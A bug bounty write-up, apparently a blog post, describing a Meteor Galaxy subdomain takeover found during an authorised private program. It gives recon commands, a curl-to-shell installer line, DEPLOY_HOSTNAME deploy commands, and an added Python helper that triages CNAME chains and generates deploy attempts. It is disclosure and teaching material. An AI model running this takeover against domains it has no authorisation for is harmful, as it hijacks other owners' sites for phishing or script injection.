In the name of Allah
Hi guys, I’m here again, YoungVanda. In this write-up I’m going to talk about a Meteor subdomain takeover: from a simple recon to one of the trickiest exploitations of my life 😉
In this write-up I explain everything from the beginning. If you just want to get to the exploitation part, check out the Exploitation heading at the end.
Also if you haven’t read this write-up, give it a go. It’s a good write-up and it helped me a lot during the exploitation process.
It was a private program, with this scope: *.redacted.com
The first thing I do when facing a small company/target is just running Knockpy to get the vibe of the domain. Like:
I ran Knockpy and it gave me a few subdomains, which I just opened manually.
I found an interesting subdomain.
When I saw this page I said OK, messages like this are usually a sign of a subdomain takeover. I’m not a big fan of subdomain takeovers, but I said why not!!! Let’s dive into it 🔥🔥🔥
For those who don’t know what a subdomain takeover is:
A subdomain takeover happens when a DNS record (usually a CNAME) still points at a resource on an external service that has been deleted or was never claimed, so anyone who registers that resource on the provider can serve their own content under the target’s subdomain.
Back to the story: I ran Nuclei, and after a second Nuclei told me, you’re a lucky boy 😁 Just get out of here, man. Get out of here.
Every Nuclei template usually carries extra information in its metadata, including references on how to exploit the vulnerability. So here is what I did to find the write-up:
cd nuclei-templates/
find . -name "template-name.yaml"
cat ./http/takeovers/template-name.yaml
So I found the write-up. The first thing I did, according to the write-up, was installing Meteor:
Right here…
# Other ways here: https://docs.meteor.com/install.html
# I installed this way
curl https://install.meteor.com/ | sh
Next step is creating Meteor application. I used this command:
# Execute the command with a normal user, not root.
mkdir poc && cd poc
meteor create --minimal .
Note:
To create a Meteor application you shouldn’t be the root user. That was one of my problems, so to make this work I used my Amazon VPS with an Ubuntu normal user.
So far, all the required files have been created. Now edit this file,
client/main.html, and put your flag there:
<platform-username> POC Takeover
nano client/main.html # Put your <platform-username> POC Takeover
Now go to www.meteor.com and sign up. Also note that you need to enter your payment details to be able to use the custom subdomain feature.
meteor login # Enter your username & password
It’s time for the final step.
DEPLOY_HOSTNAME=[CNAME] meteor deploy [sub.target.com]
In the [CNAME] part, put the CNAME target of your target subdomain (what dig shows for it).
But in my case it didn’t work. You can try these:
# Didn't work for me
DEPLOY_HOSTNAME=eu-west-1.galaxy.meteor.com meteor deploy [sub.target.com]
# Didn't work for me
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy [sub.target.com]
# Worked for me
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy [sub.target.com]
I was disappointed that I couldn’t take over the subdomain. I had spent around 10 hours, over two days, trying to exploit the vulnerability, without success. Then, suddenly, I came up with an idea, though to me it was more like a shot in the dark :)
I discussed my problem on forums.meteor.com, just asking for some help :)
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy travel.target.com
Finally, after 2 days of exploiting and 3 days of waiting for some help, it worked!!!
Man, the moment I realised that the application was being deployed I was over the moon.
It was marvellous. Like a beautiful woman in a red dress with red lipstick
Like this woman:
Ohhh, my bad, sorry, I meant this one:
# Follow the steps with a normal user, not root.
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
meteor create --minimal .
nano client/main.html # Put your <platform-username> POC Takeover
meteor login # Enter username and password - Sign up here: www.meteor.com
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If it didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work? Try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work? Try this one: (this one worked for me)
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Check out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still have problems deploying to the target, do the trick!!!
# Go to https://forums.meteor.com and ask for some help
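As an added example (my code, not the author’s and not anything shipped by Meteor), here is the recon and deploy logic from the steps above written down so it can be run offline: follow the CNAME chain from the subdomain, decide whether it ends on a Galaxy host, and generate the DEPLOY_HOSTNAME attempts in the same fallback order as the summary. The DNS lookup is passed in as a callable (here backed by a constructed sample zone; in real use you would feed it dig output or dnspython answers), and the Galaxy suffix list and the fallback order are assumptions taken from the commands in this post.

```python
"""Offline helpers for the Meteor Galaxy takeover workflow described above.

Added example, not code from the write-up or from Meteor. The DNS lookup
is passed in as a callable so this runs without network access; the
Galaxy suffixes and the DEPLOY_HOSTNAME fallback order are assumptions
taken from the commands in this post, and the sample zone is constructed.
"""

# Hosts that Galaxy deployments are CNAMEd to, per the post's commands (assumption).
GALAXY_SUFFIXES = ("galaxy-ingress.meteor.com", "galaxy.meteor.com")

# Constructed sample zone: name -> CNAME target, with trailing dots as dig prints them.
SAMPLE_ZONE = {
    "travel.target.com.": "eu-west-1.galaxy-ingress.meteor.com.",
    "shop.target.com.": "shop-prod.example-cdn.net.",
    "loop.target.com.": "loop2.target.com.",
    "loop2.target.com.": "loop.target.com.",
}


def _fqdn(name):
    return name.strip().rstrip(".").lower() + "."


def resolve_cname_chain(name, lookup, max_hops=8):
    """Follow CNAMEs from `name`. Returns (final_name, chain).

    `lookup(fqdn)` returns the CNAME target or None when there is no CNAME.
    Stops on a missing record, a loop, or after max_hops.
    """
    name = _fqdn(name)
    chain = [name]
    seen = {name}
    for _ in range(max_hops):
        target = lookup(name)
        if target is None:
            break
        target = _fqdn(target)
        if target in seen:  # CNAME loop: stop instead of spinning
            break
        chain.append(target)
        seen.add(target)
        name = target
    return name, chain


def is_galaxy_host(host):
    """True for galaxy.meteor.com, galaxy-ingress.meteor.com and regional forms of them."""
    host = host.rstrip(".").lower()
    return any(host == s or host.endswith("." + s) for s in GALAXY_SUFFIXES)


def candidate_deploy_hostnames(cname):
    """DEPLOY_HOSTNAME values in the post's fallback order: the CNAME itself,
    then the un-regioned ingress host, then galaxy.meteor.com."""
    host = cname.rstrip(".").lower()
    candidates = [host]
    for suffix in GALAXY_SUFFIXES:
        if suffix not in candidates:
            candidates.append(suffix)
    return candidates


def deploy_commands(subdomain, cname):
    """Shell lines to run one by one until `meteor deploy` accepts the host."""
    sub = subdomain.rstrip(".").lower()
    return [f"DEPLOY_HOSTNAME={h} meteor deploy {sub}"
            for h in candidate_deploy_hostnames(cname)]


def poc_deployed(body, platform_username):
    """After deploying, confirm the flag from client/main.html is served under
    the target hostname; only this actually proves the takeover."""
    return f"{platform_username} POC Takeover" in body


def triage(subdomain, lookup):
    """Decide whether a subdomain is worth attempting against Galaxy."""
    final, chain = resolve_cname_chain(subdomain, lookup)
    if len(chain) == 1:
        return {"candidate": False, "reason": "no CNAME record"}
    if not is_galaxy_host(final):
        return {"candidate": False, "reason": f"CNAME ends at {final}, not Galaxy"}
    # A Galaxy CNAME alone is not a takeover: the app name must be unclaimed
    # (the 'not found' style page seen in recon) and the deploy must succeed.
    return {"candidate": True, "cname": final,
            "commands": deploy_commands(subdomain, final)}


if __name__ == "__main__":
    for sub in ("travel.target.com", "shop.target.com", "loop.target.com", "www.target.com"):
        print(sub, triage(sub, SAMPLE_ZONE.get))
```

The chain follower caps hops and detects loops because misconfigured zones do both, and a dangling record only matters when the chain actually ends on a Galaxy host. Treat a positive triage result as a lead, not a finding: the deploy succeeding and poc_deployed returning True for the target hostname are what you report.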
It was a private RDP program, so I really tried to escalate it to High/P2 by showing a Stored XSS scenario. But it didn’t work; they closed it as Medium/P3.
Triager said this:
Oh man… wait a minute, I tweet about my recent findings and some other bug bounty tips, so check out my Twitter account. Sorry, X account :)
My Twitter Account: @young_vanda_